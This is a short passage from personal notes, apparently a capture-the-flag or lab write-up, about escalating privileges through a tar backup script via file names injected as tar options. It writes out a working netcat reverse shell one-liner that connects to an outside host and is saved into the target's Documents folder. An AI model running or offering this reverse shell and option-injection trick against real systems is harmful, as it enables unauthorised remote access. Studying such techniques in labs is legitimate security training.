sleeptoken/zettelkasten/LFI and crack.md

 The script is backing up our `Documents` folder using `tar` to compress the archive.

 Checking on [GTFOBins](https://gtfobins.github.io/gtfobins/tar/) what we can do with `tar` confirms that we can exploit it by creating 2 files which names will be interpreted as options passed to the `tar` command.

-create a revshell using the pentest monkey revshell.

 ```sh
 echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.50.72 4444 >/tmp/f" > /home/server-management/Documents/rev.sh